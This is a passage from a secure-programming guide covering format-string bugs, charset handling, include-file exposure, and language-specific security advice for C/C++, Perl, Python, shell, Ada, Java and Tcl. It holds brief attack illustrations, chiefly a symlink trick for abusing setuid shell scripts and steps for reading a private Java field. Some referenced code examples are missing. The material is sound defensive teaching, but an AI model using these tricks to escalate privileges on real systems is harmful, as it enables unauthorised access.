attacker can specify a “parameter” that wasn’t actually passed. The %n conversion specification has been
standard part of C since its beginning, is required by all C standards, and is used by real programs. In
2000, Greg KH did a quick search of source code and identified the programs BitchX (an irc client),
Nedit (a program editor), and SourceNavigator (a program editor / IDE / Debugger) as using %n, and
there are doubtless many more. Deprecating %n would probably be a good idea, but even without %n
there can be significant problems. Many papers discuss these attacks in more detail, for example, you can
see Avoiding security holes when developing an application - Part 4: format strings.
Since in many cases the results are sent back to the user, this attack can also be used to expose internal
information about the stack. This information can then be used to circumvent stack protection systems
such as StackGuard and ProPolice; StackGuard uses constant “canary” values to detect attacks, but if the
stack’s contents can be displayed, the current value of the canary will be exposed, suddenly making the
software vulnerable again to stack smashing attacks.
A formatting string should almost always be a constant string, possibly involving a function call to
implement a lookup for internationalization (e.g., via gettext’s _()). Note that this lookup must be limited
123
Chapter 9. Send Information Back Judiciously
to values that the program controls, i.e., the user must be allowed to only select from the message files
controlled by the program. It’s possible to filter user data before using it (e.g., by designing a filter listing
legal characters for the format string such as [A-Za-z0-9]), but it’s usually better to simply prevent the
problem by using a constant format string or fputs() instead. Note that although I’ve listed this as an
“output” problem, this can cause problems internally to a program before output (since the output
routines may be saving to a file, or even just generating internal state such as via snprintf()).
The problem of input formatting causing security problems is not an idle possibility; see CERT Advisory
CA-2000-13 for an example of an exploit using this weakness. For more information on how these
problems can be exploited, see Pascal Bouchareine’s email article titled “[Paper] Format bugs”,
published in the July 18, 2000 edition of Bugtraq. As of December 2000, developmental versions of the
gcc compiler support warning messages for insecure format string usages, in an attempt to help
developers avoid these problems.
Of course, this all begs the question as to whether or not the internationalization lookup is, in fact,
secure. If you’re creating your own internationalization lookup routines, make sure that an untrusted user
can only specify a legal locale and not something else like an arbitrary path.
Clearly, you want to limit the strings created through internationalization to ones you can trust.
Otherwise, an attacker could use this ability to exploit the weaknesses in format strings, particularly in
C/C++ programs. This has been an item of discussion in Bugtraq (e.g., see John Levon’s Bugtraq post on
July 26, 2000). For more information, see the discussion on permitting users to only select legal language
values in Section 5.10.3.
Although it’s really a programming bug, it’s worth mentioning that different countries notate numbers in
different ways, in particular, both the period (.) and comma (,) are used to separate an integer from its
fractional part. If you save or load data, you need to make sure that the active locale does not interfere
with data handling. Otherwise, a French user may not be able to exchange data with an English user,
because the data stored and retrieved will use different separators. I’m unaware of this being used as a
security problem, but it’s conceivable.
Many web pages leave the character encoding ("charset" parameter in HTTP) undefined. In earlier versions of
HTML and HTTP, the character encoding was supposed to default to ISO-8859-1 if it wasn’t defined. In fact,
many browsers had a different default, so it was not possible to rely on the default being ISO-8859-1. HTML
version 4 legitimizes this - if the character encoding isn’t specified, any character encoding can be used.
If the web server doesn’t specify which character encoding is in use, it can’t tell which characters are special.
Web pages with unspecified character encoding work most of the time because most character sets assign the
same characters to byte values below 128. But which of the values above 128 are special? Some 16-bit
124
Chapter 9. Send Information Back Judiciously
character-encoding schemes have additional multi-byte representations for special characters such as "<".
Some browsers recognize this alternative encoding and act on it. This is "correct" behavior, but it makes attacks
using malicious scripts much harder to prevent. The server simply doesn’t know which byte sequences
represent the special characters.
For example, UTF-7 provides alternative encoding for "<" and ">", and several popular browsers recognize
these as the start and end of a tag. This is not a bug in those browsers. If the character encoding really is
UTF-7, then this is correct behavior. The problem is that it is possible to get into a situation in which the
browser and the server disagree on the encoding.
Thankfully, though explaining the issue is tricky, its resolution in HTML is easy. In the HTML header,
simply specify the charset, like this example from CERT:
<HTML>
<HEAD>
<META http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
<TITLE>HTML SAMPLE</TITLE>
</HEAD>
<BODY>
<P>This is a sample HTML page
</BODY>
</HTML>
From a technical standpoint, an even better approach is to set the character encoding as part of the HTTP
protocol output, though some libraries make this more difficult. This is technically better because it
doesn’t force the client to examine the header to determine a character encoding that would enable it to
read the META information in the header. Of course, in practice a browser that couldn’t read the META
information given above and use it correctly would not succeed in the marketplace, but that’s a different
issue. In any case, this just means that the server would need to send as part of the HTTP protocol, a
“charset” with the desired value. Unfortunately, it’s hard to heartily recommend this (technically better)
approach, because some older HTTP/1.0 clients did not deal properly with an explicit charset parameter.
Although the HTTP/1.1 specification requires clients to obey the parameter, it’s suspicious enough that
you probably ought to use it as an adjunct to forcing the use of the correct character encoding, and not
your sole mechanism.
• Place the include/configuration files outside of the web documentation root (so that the web server will
never serve the files). Really, this is the best approach unless there’s some reason the files have to be
inside the document root.
125
Chapter 9. Send Information Back Judiciously
• Configure the web server so it will not serve include files as text. For example, if you’re using Apache,
you can add a handler or an action for .inc files like so:
<Files *.inc>
Order allow,deny
Deny from all
</Files>
• Place the include files in a protected directory (using .htaccess), and designate them as files that won’t
be served.
• Use a filter to deny access to the files. For Apache, this can be done using:
<Files ~ "\.phpincludes">
Order allow,deny
Deny from all
</Files>
If you need full regular expressions to match filenames, in Apache you could use the FilesMatch
directive.
• If your include file is a valid script file, which your server will parse, make sure that it doesn’t act on
user-supplied parameters and that it’s designed to be secure.
These approaches won’t protect you from users who have access to the directories your files are in if they
are world-readable. You could change the permissions of the files so that only the uid/gid of the
webserver can read these files. However, this approach won’t work if the user can get the web server to
run his own scripts (the user can just write scripts to access your files). Fundamentally, if your site is
being hosted on a server shared with untrusted people, it’s harder to secure the system. One approach is
to run multiple web serving programs, each with different permissions; this provides more security but is
painful in practice. Another approach is to set these files to be read only by your uid/gid, and have the
server run scripts at “your” permission. This latter approach has its own problems: it means that certain
parts of the server must have root privileges, and that the script may have more permissions than
necessary.
126
Chapter 10. Language-Specific Issues
Undoubtedly there are all sorts of
languages in the world, yet none of them
is without meaning.
1 Corinthians 14:10 (NIV)
The issues discussed in the rest of this book generally apply to all languages (though some are more
common, or not present, in particular languages). However, there are also many language-specific
security issues. Many of them can be summarized as follows:
• Turn on all relevant warnings and protection mechanisms available to you where practical. For
compiled languages, this includes both compile-time mechanisms and run-time mechanisms. In
general, security-relevant programs should compile cleanly with all warnings turned on.
• If you can use a “safe mode” (e.g., a mode that limits the activities of the executable), do so. Many
interpreted languages include such a mode. In general, don’t depend on the safe mode to provide
absolute protection; most language’s safe modes have not been sufficiently analyzed for their security,
and when they are, people usually discover many ways to exploit it. However, by writing your code so
that it’s secure out of safe mode, and then adding the safe mode, you end up with defense-in-depth
(since in many cases, an attacker has to break both your application code and the safe mode).
• Avoid dangerous and deprecated operations in the language. By “dangerous”, I mean operations which
are difficult to use correctly. For example, many languages include some mechanisms or functions that
are “magical”, that is, they try to infer the “right” thing to do using a heuristic - generally you should
avoid them, because an attacker may be able to exploit the heuristic and do something dangerous
instead of what was intended. A common error is an “off-by-one” error, in which the bound is off by
one, and sometimes these result in exploitable errors. In general, write code in a way that minimizes
the likelihood of off-by-one errors. If there are standard conventions in the language (e.g., for writing
loops), use them.
• Ensure that the languages’ infrastructure (e.g., run-time library) is available and secured.
• Languages that automatically garbage-collect strings should be especially careful to immediately erase
secret data (in particular secret keys and passwords).
• Know precisely the semantics of the operations that you are using. Look up each operation’s semantics
in its documentation. Do not ignore return values unless you’re sure they cannot be relevant. Don’t
ignore the difference between “signed” and “unsigned” values. This is particularly difficult in
languages which don’t support exceptions, like C, but that’s the way it goes.
Here are some of the key issues for specific languages. However, do not forget the issues discussed
elsewhere. For example, most languages have a formatting library, so be careful to ensure that an attacker
cannot control the format commands (see Section 9.4 for more information).
10.1. C/C++
It is possible to develop secure code using C or C++, but both languages include fundamental design
decisions that make it more difficult to write secure code. C and C++ easily permit buffer overflows,
127
Chapter 10. Language-Specific Issues
force programmers to do their own memory management, and are fairly lax in their typing systems. For
systems programs (such as an operating system kernel), C and C++ are fine choices. For applications, C
and C++ are often over-used. Strongly consider using an even higher-level language, at least for the
majority of the application. But clearly, there are many existing programs in C and C++ which won’t get
completely rewritten, and many developers may choose to develop in C and C++.
One of the biggest security problems with C and C++ programs is buffer overflow; see Chapter 6 for
more information. C has the additional weakness of not supporting exceptions, which makes it easy to
write programs that ignore critical error situations.
Another problem with C and C++ is that developers have to do their own memory management (e.g.,
using malloc(), alloc(), free(), new, and delete), and failing to do it correctly may result in a security flaw.
The more serious problem is that programs may erroneously free memory that should not be freed (e.g.,
because it’s already been freed). This can result in an immediate crash or be exploitable, allowing an
attacker to cause arbitrary code to be executed; see [Anonymous Phrack 2001]. Some systems (such as
many GNU/Linux systems) don’t protect against double-freeing at all by default, and it is not clear that
those systems which attempt to protect themselves are truly unsubvertable. Although I haven’t seen
anything written on the subject, I suspect that using the incorrect call in C++ (e.g., mixing new and
malloc()) could have similar effects. For example, on March 11, 2002, it was announced that the zlib
library had this problem, affecting the many programs that use it. Thus, when testing programs on
GNU/Linux, you should set the environment variable MALLOC_CHECK_ to 1 or 2, and you might
consider executing your program with that environment variable set with 0, 1, 2. The reason for this
variable is explained in GNU/Linux malloc(3) man page:
Recent versions of Linux libc (later than 5.4.23) and GNU libc (2.x) include a malloc implementation which is
tunable via environment variables. When MALLOC_CHECK_ is set, a special (less efficient) implementation
is used which is designed to be tolerant against simple errors, such as double calls of free() with the same
argument, or overruns of a single byte (off-by-one bugs). Not all such errors can be protected against, however,
and memory leaks can result. If MALLOC_CHECK_ is set to 0, any detected heap corruption is silently
ignored; if set to 1, a diagnostic is printed on stderr; if set to 2, abort() is called immediately. This can be useful
because otherwise a crash may happen much later, and the true cause for the problem is then very hard to track
down.
There are various tools to deal with this, such as Electric Fence and Valgrind; see Section 11.7 for more
information. If unused memory is not free’d, (e.g., using free()), that unused memory may accumulate -
and if enough unused memory can accumulate, the program may stop working. As a result, the unused
memory may be exploitable by attackers to create a denial of service. It’s theoretically possible for
attackers to cause memory to be fragmented and cause a denial of service, but usually this is a fairly
impractical and low-risk attack.
Be as strict as you reasonably can when you declare types. Where you can, use “enum” to define
enumerated values (and not just a “char” or “int” with special values). This is particularly useful for
values in switch statements, where the compiler can be used to determine if all legal values have been
covered. Where it’s appropriate, use “unsigned” types if the value can’t be negative.
One complication in C and C++ is that the character type “char” can be signed or unsigned, depending
on the compiler and machine; the C standard permits either. When a signed char with its high bit set is
saved in an integer, the result will be a negative number; in some cases this can be exploitable. In
general, use “unsigned char” instead of char or signed char for buffers, pointers, and casts when dealing
with character data that may have values greater than 127 (0x7f). And when compiling, try to invoke a
compiler option that forces unspecified "char"s to be unsigned. Portable programs shouldn’t depend on
whether a char is signed or not, and by forcing it to be unsigned, the resulting executable can avoid a few
128
Chapter 10. Language-Specific Issues
nasty security vulnerabilities. In gcc, you can make this happen using the "-funsigned-char" option.
C and C++ are by definition rather lax in their type-checking support, but you can at least increase their
level of checking so that some mistakes can be detected automatically. Turn on as many compiler
warnings as you can and change the code to cleanly compile with them, and strictly use ANSI prototypes
in separate header (.h) files to ensure that all function calls use the correct types. For C or C++
compilations using gcc, use at least the following as compilation flags (which turn on a host of warning
messages) and try to eliminate all warnings (note that -O2 is used since some warnings can only be
detected by the data flow analysis performed at higher optimization levels):
Doc Shankar (of IBM) recommends the following set of compiler options when using gcc; it may take
some effort to make existing programs conform to all these checks, but these checks can also help find a
number problems:
You might want “-W -pedantic” too. Remember to add the "-funsigned-char" option to this set.
Many C/C++ compilers can detect inaccurate format strings. For example, gcc can warn about inaccurate
format strings for functions you create if you use its __attribute__() facility (a C extension) to mark such
functions, and you can use that facility without making your code non-portable. Here is an example of
what you’d put in your header (.h) file:
/* in header.h */
#ifndef __GNUC__
# define __attribute__(x) /*nothing*/
#endif
The "format" attribute takes either "printf" or "scanf", and the numbers that follow are the parameter
number of the format string and the first variadic parameter (respectively). The GNU docs talk about this
well. Note that there are other __attribute__ facilities as well, such as "noreturn" and "const".
Avoid common errors made by C/C++ developers. Using warning systems and style checkers can help
avoid common errors. For example, be careful about not using “=” when you mean “==”. The gcc
compiler’s -Wall option, recommended above, turns on a -Wparenthesis option. This -Wparenthesis
option warns you when incorrectly use "=", and requires adding extra parentheses if you really mean to
use "=").
129
Chapter 10. Language-Specific Issues
Some organizations have defined a subset of a well-known language to try to make common mistakes in
it either impossible or more obvious. One better-known subset of C is the MISRA C guidelines [MISRA
1998]. If you intend to use a subset, it’s wise to use automated tools to check if you’ve actually used only
a subset. There’s a proprietary tool called Safer C that checks code to see if it meets most of the MISRA
C requirements (it’s not quite 100%, because some MISRA C requirements are difficult to check
automatically).
Other approaches include building many more safety checks into the language, or changing the language
itself into a variant dialect that is hopefully easier to write secure programs in. have not had any
experience using them: The Safe C Compiler (SCC) is a C-to-C compiler that adds extended pointer and
array access semantics to automatically detect memory access errors. Its front page and talk provide
interesting information, but its distribution appears limited as of 2004. Cyclone is a variant of C with far
more "compile-time, link-time, and run-time checks designed to ensure safety" (where they define safe
as free of crashes, buffer overflows, format string attacks, and some other problems). At this point you’re
really starting to use a different (though similar) language, and you should carefully decide on a language
before its use.
10.2. Perl
Perl programmers should first read the man page perlsec(1), which describes a number of issues involved
with writing secure programs in Perl. In particular, perlsec(1) describes the “taint” mode, which most
secure Perl programs should use. Taint mode is automatically enabled if the real and effective user or
group IDs differ, or you can use the -T command line flag (use the latter if you’re running on behalf of
someone else, e.g., a CGI script). Taint mode turns on various checks, such as checking path directories
to make sure they aren’t writable by others.
The most obvious affect of taint mode, however, is that you may not use data derived from outside your
program to affect something else outside your program by accident. In taint mode, all externally-obtained
input is marked as “tainted”, including command line arguments, environment variables, locale
information (see perllocale(1)), results of certain system calls (readdir, readlink, the gecos field of
getpw* calls), and all file input. Tainted data may not be used directly or indirectly in any command that
invokes a sub-shell, nor in any command that modifies files, directories, or processes. There is one
important exception: If you pass a list of arguments to either system or exec, the elements of that list are
NOT checked for taintedness, so be especially careful with system or exec while in taint mode.
Any data value derived from tainted data becomes tainted also. There is one exception to this; the way to
untaint data is to extract a substring of the tainted data. Don’t just use “.*” blindly as your substring,
though, since this would defeat the tainting mechanism’s protections. Instead, identify patterns that
identify the “safe” pattern allowed by your program, and use them to extract “good” values. After
extracting the value, you may still need to check it (in particular for its length).
The open, glob, and backtick functions call the shell to expand filename wild card characters; this can be
used to open security holes. You can try to avoid these functions entirely, or use them in a less-privileged
“sandbox” as described in perlsec(1). In particular, backticks should be rewritten using the system() call
(or even better, changed entirely to something safer).
The perl open() function comes with, frankly, “way too much magic” for most secure programs; it
interprets text that, if not carefully filtered, can create lots of security problems. Before writing code to
open or lock a file, consult the perlopentut(1) man page. In most cases, sysopen() provides a safer
130
Chapter 10. Language-Specific Issues
(though more convoluted) approach to opening a file. The new Perl 5.6 adds an open() call with 3
parameters to turn off the magic behavior without requiring the convolutions of sysopen().
Perl programs should turn on the warning flag (-w), which warns of potentially dangerous or obsolete
statements.
You can also run Perl programs in a restricted environment. For more information see the “Safe” module
in the standard Perl distribution. I’m uncertain of the amount of auditing that this has undergone, so
beware of depending on this for security. You might also investigate the “Penguin Model for Secure
Distributed Internet Scripting”, though at the time of this writing the code and documentation seems to
be unavailable.
Many installations include a setuid root version of perl named “suidperl”. However, the perldelta man
page version 5.6.1 recommends using sudo instead, stating the following:
"Note that suidperl is neither built nor installed by default in any recent version of perl. Use of suidperl is highly
discouraged. If you think you need it, try alternatives such as sudo first. See http://www.courtesan.com/sudo/".
10.3. Python
As with any language, beware of any functions which allow data to be executed as parts of a program, to
make sure an untrusted user can’t affect their input. This includes exec(), eval(), and execfile() (and
frankly, you should check carefully any call to compile()). The input() statement is also surprisingly
dangerous. [Watters 1996, 150].
Python programs with privileges that can be invoked by unprivileged users (e.g., setuid/setgid programs)
must not import the “user” module. The user module causes the pythonrc.py file to be read and executed.
Since this file would be under the control of an untrusted user, importing the user module allows an
attacker to force the trusted program to run arbitrary code.
Python does very little compile-time checking -- it has essentially no compile-time type information, for
example. This is unfortunate, resulting in a lot of latent bugs (both John Viega and I have experienced
this problem). Hopefully someday Python will implement optional static typing and type-checking, an
idea that’s been discussed for some time. A partial solution for now is PyChecker, a lint-like program
that checks for common bugs in Python source code. You can get PyChecker from
http://pychecker.sourceforge.net
Before Python version 2.3, Python included support for “Restricted Execution” through its RExec and
Bastion classes. The RExec class was primarily intended for executing applets and mobile code, but it
could also be used to try to limit privilege in a program even when the code has not been provided
externally. The Bastion module was intended to supports restricted access to another object. For more
information, see Kuchling [2000]. Earlier versions of this book identified these functions but noted them
as "programmer beware", and I was right to be concerned. More recent analysis has found that RExec
and Bastion are fundamentally flawed, and have unfixable exploitable security flaws. Thus, these classes
have been removed from Python 2.3, and should not be used to enforce security in any version of Python.
There is ongoing work to develop alternative approaches to running untrusted Python code, such as the
experimental Sandbox.py module. Do not use this experimental Sandbox.py module for serious purposes
yet.
Supporting secure execution of untrusted code in Python turns out to be a rather difficult problem. For
example, allowing a user to unrestrictedly add attributes to a class permits all sorts of ways to subvert the
131
Chapter 10. Language-Specific Issues
environment because Python’s implementation calls many “hidden” methods. By default, most Python
objects are passed by reference; if you insert a reference to a mutable value into a restricted program’s
environment, the restricted program can change the object in a way that’s visible outside the restricted
environment. Thus, if you want to give access to a mutable value, in many cases you should copy the
mutable value. Fundamentally, Python is designed to be a clean and highly reflexive language, which is
good for a general-purpose language but makes handling malicious code more difficult.
Python supports operations called "pickle" and "unpickling" to conveniently store and retrieve sets of
objects. NEVER unpickle data from an untrusted source. Python 2.2 did a half-hearted job of trying to
support unpickling from untrusted sources (the __safe_for_unpickling__ attribute), but it was never
audited and probably never really worked. Python 2.3 has removed all of this, and made explicitly clear
that unpickling is not a safe operation. For more information, see PEP 307.
% ln -s /usr/bin/setuid-shell /tmp/-x
% cd /tmp
% -x
Some systems may have closed this hole, but the point still stands: most command shells aren’t intended
for writing secure setuid/setgid programs. For programming purposes, avoid creating setuid shell scripts,
even on those systems that permit them. Instead, write a small program in another language to clean up
the environment, then have it call other executables (some of which might be shell scripts).
132
Chapter 10. Language-Specific Issues
If you still insist on using shell scripting languages, at least put the script in a directory where it cannot
be moved or changed. Set PATH and IFS to known values very early in your script; indeed, the
environment should be cleaned before the script is called. Also, very early on, “cd” to a safe directory.
Use data only from directories that is controlled by trusted users, e.g., /etc, so that attackers can’t insert
maliciously-named files into those directories. Be sure to quote every filename passed on a command
line, e.g., use "$1" not $1, because filenames with whitespace will be split. Call commands using "--" to
disable additional options where you can, because attackers may create or pass filenames beginning with
dash in the hope of tricking the program into processing it as an option. Be especially careful of
filenames embedding other characters (e.g., newlines and other control characters). Examine input
filenames especially carefully and be very restrictive on what filenames are permitted.
If you don’t mind limiting your program to only work with GNU tools (or if you detect and optionally
use the GNU tools instead when they are available), you might want to use NIL characters as the
filename terminator instead of newlines. By using NIL characters, rather than whitespace or newlines,
handling nasty filenames (e.g., those with embedded newlines) is much simpler. Several GNU tools that
output or input filenames can use this format instead of the more common “one filename per line”
format. Unfortunately, the name of this option isn’t consistent between tools; for many tools the name of
this option is “--null” or “-0”. GNU programs xargs and cpio allow using either --null or -0, tar uses
--null, find uses -print0, grep uses either --null or -Z, and sort uses either -z or --zero-terminated. Those
who find this inconsistency particularly disturbing are invited to supply patches to the GNU authors; I
would suggest making sure every program supported “--null” since that seems to be the most common
option name. For example, here’s one way to move files to a target directory, even if there may be a vast
number of files and some may have awkward names with embedded newlines (thanks to Jim Dennis for
reminding me of this):
In a similar vein, I recommend not trusting “restricted shells” to implement secure policies. Restricted
shells are shells that intentionally prevent users from performing a large set of activities - their goal is to
force users to only run a small set of programs. A restricted shell can be useful as a defense-in-depth
measure, but restricted shells are notoriously hard to configure correctly and as configured are often
subvertable. For example, some restricted shells will start by running some file in an unrestricted mode
(e.g., “.profile”) - if a user can change this file, they can force execution of that code. A restricted shell
should be set up to only run a few programs, but if any of those programs have “shell escapes” to let
users run more programs, attackers can use those shell escapes to escape the restricted shell. Even if the
programs don’t have shell escapes, it’s quite likely that the various programs can be used together (along
with the shell’s capabilities) to escape the restrictions. Of course, if you don’t set the PATH of a restricted
shell (and allow any program to run), then an attacker can use the shell escapes of many programs
(including text editors, mailers, etc.). The problem is that the purpose of a shell is to run other programs,
but those other programs may allow unintended operations -- and the shell doesn’t interpose itself to
prevent these operations.
10.5. Ada
In Ada95, the Unbounded_String type is often more flexible than the String type because it is
automatically resized as necessary. However, don’t store especially sensitive secret values such as
133
Chapter 10. Language-Specific Issues
passwords or secret keys in an Unbounded_String, since core dumps and page areas might still hold them
later. Instead, use the String type for this data, lock it into memory while it’s used, and overwrite the data
as soon as possible with some constant value such as (others => ’ ’). Use the Ada pragma
Inspection_Point on the object holding the secret after erasing the memory. That way, you can be certain
that the object containing the secret will really be erased (and that the the overwriting won’t be optimized
away).
Like many other languages, Ada’s string types (including String and Unbounded_String) can hold ASCII
0. If that’s then passed to a C library (including a kernel), that can be interpreted very differently by the
library than the caller intended.
It’s common for beginning Ada programmers to believe that the String type’s first index value is always
1, but this isn’t true if the string is sliced. Avoid this error.
It’s worth noting that SPARK is a “high-integrity subset of the Ada programming language”; SPARK
users use a tool called the “SPARK Examiner” to check conformance to SPARK rules, including flow
analysis, and there are various supports for full formal proof of the code if desired. See the SPARK
website for more information. To my knowledge, there are no OSS/FS SPARK tools. If you’re storing
passwords and private keys you should still lock them into memory if appropriate and overwrite them as
soon as possible. Note that SPARK is often used in environments where paging does not occur.
10.6. Java
If you’re developing secure programs using Java, frankly your first step (after learning Java) is to read the
two primary texts for Java security, namely Gong [1999] and McGraw [1999] (for the latter, look
particularly at section 7.1). You should also look at Sun’s posted security code guidelines at
http://java.sun.com/security/seccodeguide.html, and there’s a nice article by Sahu et al [2002] A set of
slides describing Java’s security model are freely available at http://www.dwheeler.com/javasec. You can
also see McGraw [1998].
Obviously, a great deal depends on the kind of application you’re developing. Java code intended for use
on the client side has a completely different environment (and trust model) than code on a server side.
The general principles apply, of course; for example, you must check and filter any input from an
untrusted source. However, in Java there are some “hidden” inputs or potential inputs that you need to be
wary of, as discussed below. Johnathan Nightingale [2000] made an interesting statement summarizing
many of the issues in Java programming:
... the big thing with Java programming is minding your inheritances. If you inherit methods from parents,
interfaces, or parents’ interfaces, you risk opening doors to your code.
The following are a few key guidelines, based on Gong [1999], McGraw [1999], Sun’s guidance, and my
own experience:
1. Do not use public fields or variables; declare them as private and provide accessors to them so you
can limit their accessibility.
2. Make methods private unless there is a good reason to do otherwise (and if you do otherwise,
document why). These non-private methods must protect themselves, because they may receive
tainted data (unless you’ve somehow arranged to protect them).
134
Chapter 10. Language-Specific Issues
3. The JVM may not actually enforce the accessibility modifiers (e.g., “private”) at run-time in an
application (as opposed to an applet). My thanks to John Steven (Cigital Inc.), who pointed this out
on the “Secure Programming” mailing list on November 7, 2000. The issue is that it all depends on
what class loader the class requesting the access was loaded with. If the class was loaded with a
trusted class loader (including the null/ primordial class loader), the access check returns "TRUE"
(allowing access). For example, this works (at least with Sun’s 1.2.2 VM ; it might not work with
other implementations):
a. write a victim class (V) with a public field, compile it.
b. write an “attack” class (A) that accesses that field, compile it
c. change V’s public field to private, recompile
d. run A - it’ll access V’s (now private) field.
However, the situation is different with applets. If you convert A to an applet and run it as an applet
(e.g., with appletviewer or browser), its class loader is no longer a trusted (or null) class loader.
Thus, the code will throw java.lang.IllegalAccessError, with the message that you’re trying to access
a field V.secret from class A.
4. Avoid using static field variables. Such variables are attached to the class (not class instances), and
classes can be located by any other class. As a result, static field variables can be found by any other
class, making them much more difficult to secure.
5. Never return a mutable object to potentially malicious code (since the code may decide to change it).
Note that arrays are mutable (even if the array contents aren’t), so don’t return a reference to an
internal array with sensitive data.
6. Never store user given mutable objects (including arrays of objects) directly. Otherwise, the user
could hand the object to the secure code, let the secure code “check” the object, and change the data
while the secure code was trying to use the data. Clone arrays before saving them internally, and be
careful here (e.g., beware of user-written cloning routines).
7. Don’t depend on initialization. There are several ways to allocate uninitialized objects.
8. Make everything final, unless there’s a good reason not to. If a class or method is non-final, an
attacker could try to extend it in a dangerous and unforeseen way. Note that this causes a loss of
extensibility, in exchange for security.
9. Don’t depend on package scope for security. A few classes, such as java.lang, are closed by default,
and some Java Virtual Machines (JVMs) let you close off other packages. Otherwise, Java classes
are not closed. Thus, an attacker could introduce a new class inside your package, and use this new
class to access the things you thought you were protecting.
10. Don’t use inner classes. When inner classes are translated into byte codes, the inner class is
translated into a class accesible to any class in the package. Even worse, the enclosing class’s private
fields silently become non-private to permit access by the inner class!
11. Minimize privileges. Where possible, don’t require any special permissions at all. McGraw goes
further and recommends not signing any code; I say go ahead and sign the code (so users can decide
to “run only signed code by this list of senders”), but try to write the program so that it needs
nothing more than the sandbox set of privileges. If you must have more privileges, audit that code
especially hard.
12. If you must sign your code, put it all in one archive file. Here it’s best to quote McGraw [1999]:
135
Chapter 10. Language-Specific Issues
The goal of this rule is to prevent an attacker from carrying out a mix-and-match attack in which the
attacker constructs a new applet or library that links some of your signed classes together with malicious
classes, or links together signed classes that you never meant to be used together. By signing a group of
classes together, you make this attack more difficult. Existing code-signing systems do an inadequate job
of preventing mix-and-match attacks, so this rule cannot prevent such attacks completely. But using a
single archive can’t hurt.
13. Make your classes uncloneable. Java’s object-cloning mechanism allows an attacker to instantiate a
class without running any of its constructors. To make your class uncloneable, just define the
following method in each of your classes:
public final Object clone() throws java.lang.CloneNotSupportedException {
throw new java.lang.CloneNotSupportedException();
}
If you really need to make your class cloneable, then there are some protective measures you can
take to prevent attackers from redefining your clone method. If you’re defining your own clone
method, just make it final. If you’re not, you can at least prevent the clone method from being
maliciously overridden by adding the following:
public final void clone() throws java.lang.CloneNotSupportedException {
super.clone();
}
14. Make your classes unserializeable. Serialization allows attackers to view the internal state of your
objects, even private portions. To prevent this, add this method to your classes:
private final void writeObject(ObjectOutputStream out)
throws java.io.IOException {
throw new java.io.IOException("Object cannot be serialized");
}
Even in cases where serialization is okay, be sure to use the transient keyword for the fields that
contain direct handles to system resources and that contain information relative to an address space.
Otherwise, deserializing the class may permit improper access. You may also want to identify
sensitive information as transient.
If you define your own serializing method for a class, it should not pass an internal array to any
DataInput/DataOuput method that takes an array. The rationale: All DataInput/DataOutput methods
can be overridden. If a Serializable class passes a private array directly to a DataOutput(write(byte []
b)) method, then an attacker could subclass ObjectOutputStream and override the write(byte [] b)
method to enable him to access and modify the private array. Note that the default serialization does
not expose private byte array fields to DataInput/DataOutput byte array methods.
15. Make your classes undeserializeable. Even if your class is not serializeable, it may still be
deserializeable. An attacker can create a sequence of bytes that happens to deserialize to an instance
of your class with values of the attacker’s choosing. In other words, deserialization is a kind of
public constructor, allowing an attacker to choose the object’s state - clearly a dangerous operation!
To prevent this, add this method to your classes:
private final void readObject(ObjectInputStream in)
throws java.io.IOException {
throw new java.io.IOException("Class cannot be deserialized");
}
136
Chapter 10. Language-Specific Issues
16. Don’t compare classes by name. After all, attackers can define classes with identical names, and if
you’re not careful you can cause confusion by granting these classes undesirable privileges. Thus,
here’s an example of the wrong way to determine if an object has a given class:
if (obj.getClass().getName().equals("Foo")) {
If you need to determine if two objects have exactly the same class, instead use getClass() on both
sides and compare using the == operator, Thus, you should use this form:
if (a.getClass() == b.getClass()) {
If you truly need to determine if an object has a given classname, you need to be pedantic and be
sure to use the current namespace (of the current class’s ClassLoader). Thus, you’ll need to use this
format:
if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {
This guideline is from McGraw and Felten, and it’s a good guideline. I’ll add that, where possible,
it’s often a good idea to avoid comparing class values anyway. It’s often better to try to design class
methods and interfaces so you don’t need to do this at all. However, this isn’t always practical, so it’s
important to know these tricks.
17. Don’t store secrets (cryptographic keys, passwords, or algorithm) in the code or data. Hostile JVMs
can quickly view this data. Code obfuscation doesn’t really hide the code from serious attackers.
10.7. Tcl
Tcl stands for “tool command language” and is pronounced “tickle.” Tcl is divided into two parts: a
language and a library. The language is a simple language, originally intended for issuing commands to
interactive programs and including basic programming capabilities. The library can be embedded in
application programs. You can find more information about Tcl at sites such as the Tcl.tk and the Tcl
WWW Info web page and the comp.lang.tcl FAQ launch page at http://www.tclfaq.wservice.com/tcl-faq.
My thanks go to Wojciech Kocjan for providing some of this detailed information on using Tcl in secure
applications.
For some security applications, especially interesting components of Tcl are Safe-Tcl (which creates a
sandbox in Tcl) and Safe-TK (which implements a sandboxed portable GUI for Safe Tcl), as well as the
WebWiseTclTk Toolkit which permits Tcl packages to be automatically located and loaded from
anywhere on the World Wide Web. You can find more about the latter from
http://www.cbl.ncsu.edu/software/WebWiseTclTk. It’s not clear to me how much code review this has
received.
Tcl’s original design goal to be a small, simple language resulted in a language that was originally
somewhat limiting and slow. For an example of the limiting weaknesses in the original language, see
Richard Stallman’s “Why You Should Not Use Tcl”. For example, Tcl was originally designed to really
support only one data type (string). Thankfully, these issues have been addressed over time. In particular,
version 8.0 added support for more data types (integers are stored internally as integers, lists as lists and
so on). This improves its capabilities, and in particular improves its speed.
As with essentially all scripting languages, Tcl has an "eval" command that parses and executes arbitrary
Tcl commands. And like all such scripting languages, this eval command needs to be used especially
carefully, or an attacker could insert characters in the input to cause malicious things to occur. For
137
Chapter 10. Language-Specific Issues
example, an attackers may be able insert characters with special meaning to Tcl such as embedded
whitespace (including space and newline), double-quote, curly braces, square brackets, dollar signs,
backslash, semicolon, or pound sign (or create input to cause these characters to be created during
processing). This also applies to any function that passes data to eval as well (depending on how eval is
called).
Here is a small example that may make this concept clearer; first, let’s define a small function and then
interactively invoke it directly - note that these uses are fine:
proc something {a b c d e} {
puts "A=’$a’"
puts "B=’$b’"
puts "C=’$c’"
puts "D=’$d’"
puts "E=’$e’"
}
However, continuing the example, let’s see how "eval" can be incorrectly and correctly called. If you call
eval in an incorrect (dangerous) way, it allows attackers to misuse it. However, by using commands like
list or lrange to correctly group the input, you can avoid this problem:
138
Chapter 10. Language-Specific Issues
B=’t2’
C=’t3’
D=’t4’
E=’t5’
